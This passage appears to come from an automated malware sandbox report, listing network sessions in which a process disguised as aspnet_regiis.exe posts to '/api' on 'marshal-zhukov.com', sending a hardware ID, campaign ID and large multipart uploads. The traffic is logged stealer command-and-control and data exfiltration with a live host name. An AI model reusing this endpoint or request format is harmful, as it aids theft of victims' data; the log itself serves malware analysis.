                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 32 36 64 39 0d 0a 46 68 6a 30 4d 6f 6e 67 6b 54 6c 4b 51 33 72 34 4e 41 7a 35 4f 6c 76 35 37 47 67 62 42 71 46 52 33 58 68 75 4e 4b 53 4a 77 4b 77 4c 34 54 55 2b 37 4e 58 4e 38 45 2b 61 67 72 30 35 43 4a 51 43 4d 6a 31 67 55 47 4d 79 71 52 56 67 74 4e 70 77 77 4b 6e 55 73 51 76 5a 44 43 66 51 74 65 77 73 54 71 76 48 51 57 46 4a 76 47 34 47 63 4f 6b 64 45 33 65 4e 4b 43 58 5a 56 30 6d 39 72 50 6a 39 43 34 45 4e 49 75 6e 67 71 52 6c 32 74 38 6f 49 47 41 53 74 44 6b 2f 46 54 4e 68 76 4a 6f 56 35 47 61 79 75 30 48 43 68 31 49 51 2b 33 43 44 47 4b 59 43 68 4c 58 61 6e 32 67 55 42 4d 66 55 2b 55 6c 31 52 58 58 6f 4b 53 48 51 6c 34 56 64 4a 39 45 48 30 6a 44 4c 38 56 48 76 6c 55 4a 6b 35 66 6f 2b 2b 62 51 45 78 39 52 70 53 58 50 56 6c 57 78 72 77 54 45 54 42 48
                                                                                                                                                                                                            Data Ascii: 26d9Fhj0MongkTlKQ3r4NAz5Olv57GgbBqFR3XhuNKSJwKwL4TU+7NXN8E+agr05CJQCMj1gUGMyqRVgtNpwwKnUsQvZDCfQtewsTqvHQWFJvG4GcOkdE3eNKCXZV0m9rPj9C4ENIungqRl2t8oIGAStDk/FTNhvJoV5Gayu0HCh1IQ+3CDGKYChLXan2gUBMfU+Ul1RXXoKSHQl4VdJ9EH0jDL8VHvlUJk5fo++bQEx9RpSXPVlWxrwTETBH
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 41 47 44 72 34 45 46 62 4e 7a 44 57 55 54 34 4b 43 66 51 46 6f 45 41 4a 79 50 55 6c 6c 57 32 75 30 4c 43 56 55 57 68 44 4d 69 61 44 78 50 6e 52 51 4d 70 48 4d 6f 42 52 33 75 35 74 42 59 55 6e 4d 41 30 4e 34 74 54 30 61 51 39 67 59 61 4e 30 58 59 49 6d 74 6e 62 52 54 34 57 31 33 36 4e 54 6b 46 43 2b 36 6e 6b 78 49 51 4f 30 50 43 7a 43 6f 70 4b 4f 53 75 51 6b 4e 42 47 4a 6f 36 47 30 41 34 41 62 59 4e 43 4b 4a 6b 61 77 73 54 6f 61 44 49 4f 55 4a 31 44 4e 4c 4d 65 31 63 70 6a 4f 31 4c 43 54 68 56 76 7a 34 72 63 43 6f 55 71 55 34 70 74 32 51 68 5a 46 36 2b 35 39 42 4f 51 6a 73 41 6a 4a 77 6a 56 78 4c 54 37 51 73 5a 4d 6b 37 66 62 6e 49 75 66 78 33 32 47 6b 2b 69 4e 58 4d 58 48 65 37 79 30 46 68 43 65 6b 50 47 33 57 73 55 41 4d 48 71 62 58 64 56 46 6f 51 7a 49
                                                                                                                                                                                                            Data Ascii: AGDr4EFbNzDWUT4KCfQFoEAJyPUllW2u0LCVUWhDMiaDxPnRQMpHMoBR3u5tBYUnMA0N4tT0aQ9gYaN0XYImtnbRT4W136NTkFC+6nkxIQO0PCzCopKOSuQkNBGJo6G0A4AbYNCKJkawsToaDIOUJ1DNLMe1cpjO1LCThVvz4rcCoUqU4pt2QhZF6+59BOQjsAjJwjVxLT7QsZMk7fbnIufx32Gk+iNXMXHe7y0FhCekPG3WsUAMHqbXdVFoQzI


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.1049818188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 50
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:31 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 26 6a 3d
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@nmrzv88&j=
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:33 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=odl4c2rvu1l6m9anjk3413lhv0; expires=Mon, 10-Mar-2025 05:06:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8JWHuExpD5C05Le0SFpe9bT28Bypms0QS8SSkjGDhKuZ2SB9j4P6ndmH5Y1n%2BubdMOlirrJPI%2FdSubpOMw5%2FKMj65G8OxUcz9p9VqdNHH3qTLSzFc0PQTAMwPaIiiPqJLpVzlM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b664bdc47af-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=952&delivery_rate=2391412&cwnd=251&unsent_bytes=0&cid=d13e7167a01b77e5&ts=1940&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC353INData Raw: 34 34 36 63 0d 0a 52 46 31 53 76 32 61 33 65 50 47 41 67 38 6d 4a 36 78 5a 31 2f 4b 67 7a 53 66 2f 67 73 47 33 46 65 30 34 43 37 31 53 2f 49 42 41 2f 66 79 53 64 58 49 4e 55 30 2f 50 6d 36 37 4f 66 5a 41 43 5a 68 42 45 6f 6d 38 4b 4b 43 36 51 58 50 57 66 44 64 73 6c 4e 4d 6e 34 37 4d 39 4d 56 30 6c 54 54 35 66 76 72 73 37 42 74 56 35 6e 47 45 58 50 64 68 64 6f 50 70 42 63 73 59 34 51 37 7a 30 78 7a 4c 44 45 31 31 77 50 55 48 4a 44 73 37 71 7a 73 6a 6e 63 66 6b 73 46 65 49 5a 4c 43 6e 45 2b 67 41 57 77 34 7a 52 6e 61 56 48 45 4a 50 43 48 55 52 4d 70 55 69 71 4c 6d 70 36 76 52 4e 42 53 5a 79 6c 38 76 6d 34 76 59 42 61 30 66 4c 57 61 46 4a 4e 5a 47 65 43 77 2f 4e 74 59 4a 33 51 69 64 35 75 6d 6e 36 6f 52 33 56 39 43 4b 56 6a 50 64 32 70 4a 63 6c 52 6f 39 63
                                                                                                                                                                                                            Data Ascii: 446cRF1Sv2a3ePGAg8mJ6xZ1/KgzSf/gsG3Fe04C71S/IBA/fySdXINU0/Pm67OfZACZhBEom8KKC6QXPWfDdslNMn47M9MV0lTT5fvrs7BtV5nGEXPdhdoPpBcsY4Q7z0xzLDE11wPUHJDs7qzsjncfksFeIZLCnE+gAWw4zRnaVHEJPCHURMpUiqLmp6vRNBSZyl8vm4vYBa0fLWaFJNZGeCw/NtYJ3Qid5umn6oR3V9CKVjPd2pJclRo9c
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 46 32 42 71 42 36 75 71 67 37 70 74 2f 48 70 50 48 55 53 61 58 6a 64 45 50 6f 42 4d 6d 62 34 63 79 30 45 39 30 4a 6a 39 77 6b 30 54 53 41 74 4f 36 6f 59 6a 75 6d 58 4d 62 69 49 68 72 61 34 4c 4d 79 30 2b 67 46 57 77 34 7a 54 37 59 51 58 45 74 4d 44 50 56 44 38 63 61 67 65 54 73 72 76 6d 50 63 52 6d 55 79 55 4d 68 6b 34 54 52 42 71 77 51 4b 57 65 4a 64 70 4d 43 64 54 35 2f 61 4a 30 6c 32 42 47 66 36 50 61 72 71 35 59 36 44 74 37 4e 58 57 76 46 77 74 59 4f 6f 78 67 6f 62 6f 4d 79 30 55 52 38 4b 7a 41 32 31 77 54 53 45 4a 76 71 34 4b 62 67 68 6e 51 53 6b 38 35 58 4a 35 79 48 6b 6b 48 6e 48 6a 51 67 31 58 62 7a 52 58 45 30 66 51 58 65 43 74 73 64 68 61 4c 2b 35 66 4c 4a 63 78 76 65 6b 68 45 6c 6d 49 33 41 44 72 55 63 49 6e 4b 42 4d 39 74 50 63 53 67 2f 4e 64
                                                                                                                                                                                                            Data Ascii: F2BqB6uqg7pt/HpPHUSaXjdEPoBMmb4cy0E90Jj9wk0TSAtO6oYjumXMbiIhra4LMy0+gFWw4zT7YQXEtMDPVD8cageTsrvmPcRmUyUMhk4TRBqwQKWeJdpMCdT5/aJ0l2BGf6Parq5Y6Dt7NXWvFwtYOoxgoboMy0UR8KzA21wTSEJvq4KbghnQSk85XJ5yHkkHnHjQg1XbzRXE0fQXeCtsdhaL+5fLJcxvekhElmI3ADrUcInKBM9tPcSg/Nd
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 68 61 4c 2b 35 66 4c 4a 63 78 76 65 6b 68 45 6e 6c 49 4c 5a 42 61 4d 5a 4b 32 32 49 4e 64 70 42 66 79 45 31 50 74 6f 41 32 52 4f 65 35 4f 47 73 37 34 78 6d 45 70 66 47 58 57 76 54 77 74 55 58 35 30 46 73 54 34 6f 67 33 6d 31 78 4e 7a 5a 77 77 6b 72 4d 57 70 54 75 6f 66 4f 72 6a 6e 45 66 6c 63 78 5a 4b 34 2b 48 33 41 53 6d 45 79 70 68 67 44 72 62 51 6e 4d 6d 4f 54 7a 64 41 39 49 49 67 65 66 6e 75 65 48 4a 4f 6c 65 5a 30 68 46 7a 33 62 54 43 47 4c 59 50 62 6c 57 4f 4f 4e 4e 46 5a 47 59 67 66 73 52 45 30 68 62 54 75 71 47 67 36 34 56 7a 48 35 6a 4f 57 53 53 53 69 38 41 4f 71 78 63 2b 5a 34 30 2f 30 30 31 2b 4c 7a 49 33 30 41 2f 66 46 35 66 6c 34 4f 75 6c 79 58 4d 50 33 70 49 52 48 59 32 50 33 69 47 73 46 53 55 67 6b 6e 6a 45 41 6e 55 71 66 32 69 64 41 4e 6b
                                                                                                                                                                                                            Data Ascii: haL+5fLJcxvekhEnlILZBaMZK22INdpBfyE1PtoA2ROe5OGs74xmEpfGXWvTwtUX50FsT4og3m1xNzZwwkrMWpTuofOrjnEflcxZK4+H3ASmEyphgDrbQnMmOTzdA9IIgefnueHJOleZ0hFz3bTCGLYPblWOONNFZGYgfsRE0hbTuqGg64VzH5jOWSSSi8AOqxc+Z40/001+LzI30A/fF5fl4OulyXMP3pIRHY2P3iGsFSUgknjEAnUqf2idANk
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 61 37 75 6a 58 4d 54 6d 4d 55 52 5a 64 32 46 79 6b 2f 2f 57 51 4e 48 75 48 54 38 65 44 49 35 63 53 6d 64 41 39 6c 61 79 36 4c 74 71 4f 65 42 65 78 47 58 78 6c 73 69 6c 6f 37 5a 43 36 73 51 4b 57 61 4d 4d 39 68 44 64 69 6f 31 4e 74 34 48 32 68 57 63 36 71 48 6c 71 34 35 73 56 38 61 4b 64 44 79 57 6a 4e 52 50 75 46 63 31 49 49 6f 36 6e 52 6f 79 4b 6a 59 32 32 77 48 5a 47 35 58 71 35 4b 50 76 69 48 49 52 6e 63 56 56 4c 70 79 4e 31 67 4f 70 45 79 31 68 67 54 33 53 53 58 64 6d 63 58 44 61 48 4a 56 43 30 39 50 69 76 66 79 5a 65 46 65 42 68 45 68 72 6d 6f 36 53 56 2b 63 59 50 6d 71 48 4f 4e 68 4e 64 79 55 77 4e 39 41 43 32 52 43 61 36 75 65 6b 34 70 74 33 47 35 44 4e 58 79 65 54 6a 39 67 4d 71 6c 6c 69 49 49 6f 75 6e 52 6f 79 43 6a 67 39 38 77 2f 5a 48 64 50 39
                                                                                                                                                                                                            Data Ascii: a7ujXMTmMURZd2Fyk//WQNHuHT8eDI5cSmdA9lay6LtqOeBexGXxlsilo7ZC6sQKWaMM9hDdio1Nt4H2hWc6qHlq45sV8aKdDyWjNRPuFc1IIo6nRoyKjY22wHZG5Xq5KPviHIRncVVLpyN1gOpEy1hgT3SSXdmcXDaHJVC09PivfyZeFeBhEhrmo6SV+cYPmqHONhNdyUwN9AC2RCa6uek4pt3G5DNXyeTj9gMqlliIIounRoyCjg98w/ZHdP9
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 63 30 45 49 61 4b 43 57 75 72 68 63 49 66 70 46 73 64 64 6f 34 67 31 6b 39 2b 5a 69 42 2b 78 45 54 53 46 74 4f 36 6f 61 33 6b 67 48 63 59 6e 38 4e 64 4a 70 69 4c 31 77 36 68 48 53 5a 71 6a 54 44 62 51 33 63 73 50 44 48 58 44 64 49 53 6c 4f 48 7a 36 36 58 4a 63 77 2f 65 6b 68 45 43 6d 70 44 63 48 2b 63 47 59 6e 6e 4e 4d 64 45 43 4b 6d 59 37 4f 74 49 41 30 68 61 56 35 2b 65 6d 36 6f 5a 31 46 35 48 4f 57 69 4b 62 67 39 38 4b 71 68 30 2b 61 6f 59 35 30 55 74 2b 4b 33 39 2b 6e 51 50 4e 57 73 75 69 30 4b 62 6c 68 33 4d 42 33 74 55 66 4d 74 32 46 33 6b 2f 2f 57 53 31 73 67 6a 58 53 51 58 45 6e 4e 53 4c 50 43 4e 77 53 6c 75 37 71 70 65 32 62 63 68 69 58 79 56 49 69 6d 6f 72 65 42 61 51 65 62 43 37 4e 4d 63 55 43 4b 6d 59 63 4a 38 30 4a 6c 51 58 64 2b 36 47 73 35
                                                                                                                                                                                                            Data Ascii: c0EIaKCWurhcIfpFsddo4g1k9+ZiB+xETSFtO6oa3kgHcYn8NdJpiL1w6hHSZqjTDbQ3csPDHXDdISlOHz66XJcw/ekhECmpDcH+cGYnnNMdECKmY7OtIA0haV5+em6oZ1F5HOWiKbg98Kqh0+aoY50Ut+K39+nQPNWsui0Kblh3MB3tUfMt2F3k//WS1sgjXSQXEnNSLPCNwSlu7qpe2bchiXyVIimoreBaQebC7NMcUCKmYcJ80JlQXd+6Gs5
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 51 32 46 51 74 6b 6f 33 62 42 71 4d 52 4c 32 43 4a 4d 74 70 48 63 53 6f 30 4e 39 34 4c 30 52 4f 64 36 2b 37 72 70 63 6c 7a 44 39 36 53 45 51 71 47 67 64 34 43 35 77 5a 69 65 63 30 78 30 51 49 71 5a 6a 4d 2b 32 41 54 66 48 4a 66 6e 35 36 48 75 69 58 38 55 6b 63 35 58 4c 35 4b 43 32 51 61 6d 48 79 6c 71 68 6a 44 51 51 58 51 67 66 33 36 64 41 38 31 61 79 36 4c 42 73 4f 61 46 63 31 65 42 68 45 68 72 6d 6f 36 53 56 2b 63 53 49 47 53 4b 4e 74 42 42 65 69 4d 37 4f 74 67 45 33 51 69 62 34 75 61 35 2b 59 6c 39 45 70 4c 4a 55 53 2b 62 69 39 51 4d 6f 31 6c 69 49 49 6f 75 6e 52 6f 79 43 7a 4d 33 39 41 50 4f 57 6f 79 73 2b 4f 76 73 68 54 52 50 33 73 74 61 49 5a 4b 50 30 51 6d 6b 45 69 6c 71 6a 44 48 56 54 32 41 6c 4d 44 2f 5a 42 4e 6f 63 6c 65 50 75 72 65 79 41 64 52
                                                                                                                                                                                                            Data Ascii: Q2FQtko3bBqMRL2CJMtpHcSo0N94L0ROd6+7rpclzD96SEQqGgd4C5wZiec0x0QIqZjM+2ATfHJfn56HuiX8Ukc5XL5KC2QamHylqhjDQQXQgf36dA81ay6LBsOaFc1eBhEhrmo6SV+cSIGSKNtBBeiM7OtgE3Qib4ua5+Yl9EpLJUS+bi9QMo1liIIounRoyCzM39APOWoys+OvshTRP3staIZKP0QmkEilqjDHVT2AlMD/ZBNoclePureyAdR
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 46 61 4f 6c 78 41 57 67 43 53 74 33 67 6e 61 54 41 6e 31 6d 5a 77 6d 64 44 64 49 42 67 76 54 73 75 2b 7a 4a 53 31 6e 65 30 68 46 7a 33 62 66 52 41 61 6b 65 4f 6e 48 41 45 63 74 49 64 54 59 34 4a 39 4a 45 6d 31 71 56 6f 72 6e 34 70 63 6c 77 42 74 36 53 41 58 6e 47 31 34 46 59 39 30 73 7a 4c 70 52 32 79 77 49 71 64 48 46 77 7a 30 53 4e 57 74 54 68 38 37 6e 74 69 6d 49 55 32 66 52 76 44 49 65 50 31 42 69 32 4a 78 4a 6e 6c 7a 76 62 56 57 4e 71 4b 6a 50 54 43 74 49 4d 30 36 79 68 70 4b 76 52 54 56 66 57 69 6d 35 6c 33 5a 71 53 56 2b 63 73 4c 32 36 44 4d 63 74 54 50 77 45 6c 50 64 73 54 78 46 72 64 6f 75 66 72 73 39 6b 36 56 35 72 62 45 58 50 4e 30 49 6c 61 39 45 35 38 4d 70 4a 34 78 41 4a 6b 5a 6d 64 69 6b 30 54 48 57 73 75 69 70 71 6a 35 6d 33 49 55 69 4d 6b
                                                                                                                                                                                                            Data Ascii: FaOlxAWgCSt3gnaTAn1mZwmdDdIBgvTsu+zJS1ne0hFz3bfRAakeOnHAEctIdTY4J9JEm1qVorn4pclwBt6SAXnG14FY90szLpR2ywIqdHFwz0SNWtTh87ntimIU2fRvDIeP1Bi2JxJnlzvbVWNqKjPTCtIM06yhpKvRTVfWim5l3ZqSV+csL26DMctTPwElPdsTxFrdoufrs9k6V5rbEXPN0Ila9E58MpJ4xAJkZmdik0THWsuipqj5m3IUiMk
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 6f 70 50 6b 68 6f 69 62 6f 6f 67 7a 41 39 56 4b 44 67 78 79 78 54 43 46 64 4f 73 6f 61 32 72 30 53 5a 5a 33 73 35 41 61 38 58 53 67 46 54 79 53 6e 73 77 33 79 6d 54 57 7a 49 77 66 32 69 50 53 70 55 49 30 37 71 68 37 4f 69 62 5a 68 47 64 33 46 4a 73 6f 37 7a 31 41 61 41 59 4f 6e 43 61 4f 5a 4a 73 52 41 63 42 44 73 67 48 32 78 53 55 39 50 44 72 70 63 6c 37 56 38 62 7a 45 57 50 64 76 5a 78 50 76 31 6c 30 49 4c 67 31 30 30 78 31 4d 43 35 39 2b 67 72 53 47 34 58 79 39 71 53 6b 70 30 49 32 33 6f 51 52 4c 64 33 61 67 45 48 6e 48 54 30 67 31 57 61 50 47 53 64 31 61 47 43 50 47 35 73 44 30 2f 53 68 38 37 6e 48 4e 41 58 65 6b 68 46 73 6e 70 44 41 43 61 51 50 4c 79 65 7a 43 50 70 4d 64 53 63 70 49 4e 41 49 39 42 6d 43 36 4e 2b 56 2f 6f 70 36 47 5a 6e 63 51 47 76 54
                                                                                                                                                                                                            Data Ascii: opPkhoiboogzA9VKDgxyxTCFdOsoa2r0SZZ3s5Aa8XSgFTySnsw3ymTWzIwf2iPSpUI07qh7OibZhGd3FJso7z1AaAYOnCaOZJsRAcBDsgH2xSU9PDrpcl7V8bzEWPdvZxPv1l0ILg100x1MC59+grSG4Xy9qSkp0I23oQRLd3agEHnHT0g1WaPGSd1aGCPG5sD0/Sh87nHNAXekhFsnpDACaQPLyezCPpMdScpINAI9BmC6N+V/op6GZncQGvT
                                                                                                                                                                                                            2024-11-14 11:19:33 UTC1369INData Raw: 6f 64 4f 6e 57 4f 4a 74 70 38 54 41 73 74 4e 38 30 48 6c 7a 61 55 37 2b 32 56 31 62 35 6c 45 49 36 49 64 79 69 4c 67 5a 4a 42 35 77 46 73 4f 4d 30 62 7a 30 56 69 4a 58 30 63 32 67 6e 5a 57 6f 79 73 2b 4f 76 39 79 53 78 45 30 49 70 44 61 38 58 43 6c 51 79 31 43 79 70 6a 6d 7a 57 61 66 45 77 4c 4c 54 66 4e 42 35 63 72 6e 75 62 33 76 75 69 5a 63 79 6d 67 35 30 4d 73 6a 59 47 51 4b 70 31 62 48 58 61 4f 4e 74 4e 46 4d 6d 68 2f 4b 4a 31 63 6c 54 65 42 35 66 47 6f 71 61 78 4f 56 61 2f 63 55 69 75 54 68 5a 49 51 36 51 42 73 64 73 31 75 6a 67 77 79 4e 48 39 6f 6e 55 50 62 46 35 4c 68 37 36 6a 35 6d 33 49 55 69 4d 6b 57 46 61 4f 74 32 51 36 33 46 44 31 74 69 53 44 6a 66 46 55 67 4f 6a 66 6a 4f 75 49 4c 6c 50 4b 6a 6a 65 69 66 64 31 66 51 69 6b 6c 72 78 63 4c 31 43
                                                                                                                                                                                                            Data Ascii: odOnWOJtp8TAstN80HlzaU7+2V1b5lEI6IdyiLgZJB5wFsOM0bz0ViJX0c2gnZWoys+Ov9ySxE0IpDa8XClQy1CypjmzWafEwLLTfNB5crnub3vuiZcymg50MsjYGQKp1bHXaONtNFMmh/KJ1clTeB5fGoqaxOVa/cUiuThZIQ6QBsds1ujgwyNH9onUPbF5Lh76j5m3IUiMkWFaOt2Q63FD1tiSDjfFUgOjfjOuILlPKjjeifd1fQiklrxcL1C


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.1049835188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:34 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=2KAV9D2N
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12790
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:34 UTC12790OUTData Raw: 2d 2d 32 4b 41 56 39 44 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 32 4b 41 56 39 44 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4b 41 56 39 44 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d 2d 32 4b 41 56 39 44 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                            Data Ascii: --2KAV9D2NContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--2KAV9D2NContent-Disposition: form-data; name="pid"2--2KAV9D2NContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88--2KAV9D2NContent-Dispo
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:42 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=aiflhcgiohsln1t214p9ichu9d; expires=Mon, 10-Mar-2025 05:06:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PI4oJkfS9V5csb1VzjdS0Km7%2Bb9jk9I8Cf8RQ%2BfegM9aej%2BSMDQNx3ezEuyV%2BxpO0EwYsBc1G2ohNXzGI%2Br%2BlotOqOhqLAZPhFXxS0p1SaQua3fVpPw%2Fc5rAGP7etdrxd3JYT9o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269b786f0dcb75-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1047&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13722&delivery_rate=2742424&cwnd=183&unsent_bytes=0&cid=30447559252f81c2&ts=8084&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.1049839188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:34 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=2D88HYRNI1K72SRF3GJ
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12856
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:34 UTC12856OUTData Raw: 2d 2d 32 44 38 38 48 59 52 4e 49 31 4b 37 32 53 52 46 33 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 32 44 38 38 48 59 52 4e 49 31 4b 37 32 53 52 46 33 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 38 38 48 59 52 4e 49 31 4b 37 32 53 52 46 33 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e
                                                                                                                                                                                                            Data Ascii: --2D88HYRNI1K72SRF3GJContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--2D88HYRNI1K72SRF3GJContent-Disposition: form-data; name="pid"2--2D88HYRNI1K72SRF3GJContent-Disposition: form-data; name="lid"BVnUqo--@n
                                                                                                                                                                                                            2024-11-14 11:19:39 UTC180INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 557
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            CF-RAY: 8e269b7bba216b3d-DFW
